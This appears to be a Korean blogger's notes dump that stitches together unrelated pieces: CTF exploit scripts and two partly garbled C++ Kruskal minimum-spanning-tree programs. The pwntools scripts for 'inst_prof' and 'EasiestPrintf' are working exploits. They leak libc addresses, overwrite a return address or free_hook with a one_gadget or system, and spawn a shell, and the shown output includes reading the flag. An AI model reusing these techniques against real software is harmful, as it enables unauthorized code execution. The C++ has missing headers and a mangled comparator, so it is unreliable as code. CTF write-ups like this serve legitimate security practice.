say2

from pwn import *

pad=lambda x:x.ljust(4,'\x90')
asm_=lambda x:asm(x,arch='amd64')
#r=process('./inst_prof')
r=remote('inst-prof.ctfcompetition.com',1337)
r.recvuntil('ready\n')
#raw_input()
p1=asm("add r12,rbx", arch = 'amd64')
p2=asm("add r12,rsp",arch='amd64')
p3=asm('add r12,QWORD PTR [rsp]',arch='amd64')
p4=asm('mov r14,QWORD PTR [rsp]',arch='amd64')
p5=asm('mov r14w,dx',arch='amd64')
p6=asm('inc r14',arch='amd64')
p7=asm('mov r14b,0x58',arch='amd64')

print len(p1)
r.send(p1+'\x90')
#raw_input()
libc=0x10000000000000000-u64(r.recv(8))
libc=libc/0x1000 - 0x5eafff+0x4000#+1
if libc%16 !=0:
	libc+=1
print hex(libc)
print len(p2)
r.send(pad(p2))
leak=u64(r.recv(8))
leak=0x10000000000000000-leak
leak=leak/0x1000
if leak%16==6:
	leak+=1
print hex(leak)
stack_obj=leak+1+0x70#+1
#raw_input('>')
r.send(pad(p3))
leak=u64(r.recv(8))
leak=0x10000000000000000-leak
leak=leak/0x1000
code=leak-0xb17#+1
if code%16 !=0:
	code+=1
print hex(code)
extra=code%0x10000
extra=extra/0x1000
print extra
r.send(pad(p4)+pad(p5)+pad(p6)*(0x202+extra)+pad(p7))
r.recv(8*(3+0x202+extra))
onegadget=libc+0xe9f2d
#onegadget=libc+0xf0567
print hex(onegadget)
raw_input('>')
for i in range(6):
	p8=asm('mov BYTE PTR [r14], {}'.format('0x'+hex(onegadget)[-2:]),arch='amd64')
	onegadget=onegadget/0x100
	r.send(pad(p8))
	r.send(pad(asm('mov r14b, {}'.format(hex(0x59+i)),arch='amd64')))
	r.recv(8)
#r.interactive()

p10=asm('mov r14,rsp',arch='amd64')
r.send(pad(p10))
raw_input('?')
p11=asm_('mov r14b,{}'.format(hex(stack_obj%0x100)))
r.send(pad(p11))
#r.send(p5) #p5=asm('mov r14w,dx',arch='amd64')
raw_input('>>')
for i in range(8):
	p8=asm('mov BYTE PTR [r14], 0',arch='amd64')
	r.send(pad(p8))
	print stack_obj%100+i+1
	r.send(pad(asm('mov r14b, {}'.format(hex(stack_obj%0x100+i+1)),arch='amd64')))

p9=asm('mov BYTE PTR [rsp],0x54',arch='amd64')
raw_input('>>>>')


r.send(p9)

r.interactive()

8번쨰로 푸러따 의도한 풀이는 아닌 것같다.

다른 문제에서 라이브러리를 가져와서 쉘을 땄다 ㅠ\ 

00\x00$ id

uid=1337(user) gid=1337(user) groups=1337(user)

$ ls

flag.txt

inst_prof

$ cat flag.txt

CTF{0v3r_4ND_0v3r_4ND_0v3r_4ND_0v3r}

//
//  main.cpp
//  kruskal_algo
//
//  Created by 김세희 on 2017. 5. 28..
//  Copyright © 2017년 김세희. All rights reserved.
//

#include 
#include 
#include
#include
using namespace std;

#define max 99999
int G[7][7]={{max,8,9,max,max,max,max},{8,max,max,2,11,max,max},{9,max,max,4,max,max,max},{max,2,4,max,max,7
    ,max},{max,11,max,max,max,3,10},{max,max,max,7,3,max,4},{max,max,max,max,10,4,max}};

int represent[7];
int check[7],path[7];
struct Edge{
    int v1,v2;
    int weight;
};
struct comp{
    bool operator()(struct Edge edge1,struct Edge edge2){
        return edge1.weight>edge2.weight;
    }
};
int rep_check(int v){
    if(represent[v]==-1)
        return -1;
    else if(represent[v]==v)
        return v;
    else
        return rep_check(represent[v]);
}
int main(int argc, const char * argv[]) {
    priority_queue,comp> q;
    int i,j,c,p,w,v1,v2,d=0;
    memset(represent,-1,7*sizeof(int));
    struct Edge E;
    for(i=0;i<7;i++){
        for(j=i+1;j<7;j++){
            if(G[i][j]!=max){
                E.v1=j;
                E.v2=i;
                E.weight=G[i][j];
                q.push(E);
            }
        }
    }
    while(!q.empty()){
        v1=q.top().v1;
        v2=q.top().v2;
        w=q.top().weight;
        q.pop();
        if(represent[v1]==-1&&represent[v2]==-1){
            represent[v1]=v1;represent[v2]=v1;
        }
        else if(rep_check(v1)==rep_check(v2))
            continue;
        else{
            if(represent[v1]==-1)
                represent[v1]=rep_check(v2);
            else if(represent[v2]==-1)
                represent[v2]=rep_check(v1);
            else
                represent[rep_check(v2)]=v1;
        }
        d+=w;
        printf("%c - %c diatance : %d total : %d\n",'A'+v1,'A'+v2,w,d);
    }
}

+inverse

//
//  main.cpp
//  kruskal_inverse_algo
//
//  Created by 김세희 on 2017. 5. 28..
//  Copyright © 2017년 김세희. All rights reserved.
//

#include 
#include 
#include
#include
using namespace std;

#define max 99999
int G[7][7]={{max,8,9,max,max,max,max},{8,max,max,2,11,max,max},{9,max,max,4,max,max,max},{max,2,4,max,max,7
    ,max},{max,11,max,max,max,3,10},{max,max,max,7,3,max,4},{max,max,max,max,10,4,max}};
int ch;
int represent[7];
int check[7],path[7];
struct Edge{
    int v1,v2;
    int weight;
};
struct comp{
    bool operator()(struct Edge edge1,struct Edge edge2){
        return edge1.weight,comp> q;
    int i,j,w,v1,v2,d=0,temp;
    memset(represent,0,7*sizeof(int));
    struct Edge E;
    for(i=0;i<7;i++){
        for(j=i+1;j<7;j++){
            if(G[i][j]!=max){
                E.v1=j;
                E.v2=i;
                E.weight=G[i][j];
                q.push(E);
                d+=G[i][j];
            }
        }
    }
    while(!q.empty()){
        v1=q.top().v1;
        v2=q.top().v2;
        w=q.top().weight;
        q.pop();
        temp=G[v1][v2];
        G[v1][v2]=max;G[v2][v1]=max;
        memset(check,0,7*sizeof(int));
        ch=0;
        cir(v1,v2);
        if(!ch){
            G[v1][v2]=temp;
            G[v2][v1]=temp;
            continue;
        }
        d-=w;
        printf("%c - %c diatance : %d total : %d\n",'A'+v1,'A'+v2,w,d);
    }
}

printf는 문자열이 일정크기가 넘어가면 malloc free를 호출한다(vfprintf) fsb를 이용하여 malloc_hook free_hook 을 덮어 쓸수 있다.

혹은 stdout의 함수포인터를 덮을 수도 있다. 

32bit이기 때문에

http://say2.tistory.com/262

write = {_IO_2_1_stdout + 148: 0x0804A570 - 0x1c, 0x0804A570: system + 1}

payload = '/bin/sh;'

payload += fmtstr_payload(9, write, len(p), 'byte')

출처: http://say2.tistory.com/262 [say2]

p.sendlineafter('Bye','/bin/sh;'+fmtstr_payload(9,{free_hook:system-0x08080808})+"%100000c")

from pwn import *

p=process('./EasiestPrintf')
libc=ELF('/lib/i386-linux-gnu/libc.so.6')
binary=ELF('./EasiestPrintf')
open_got=0x8049FE8



p.sendlineafter('read:\n',str(open_got))
libc=int(p.recv(10),16)-0xd5570
log.info("libc: "+hex(libc))
malloc_hook=libc+0x1b2768
log.info("malloc_hook: "+hex(malloc_hook))
free_hook=libc+0x1b38b0#0x1b3536
one_gadget=libc+0x3ac69#0x5fbc5
system=libc+0x3ada0
log.info("one_gadget"+hex(one_gadget))
log.info("system"+hex(system))
#0x5fbc5 0x5fbc6
raw_input()
p.sendlineafter('Bye','/bin/sh;'+fmtstr_payload(9,{free_hook:one_gadget-0x08080808})+"%100000c")


p.interactive()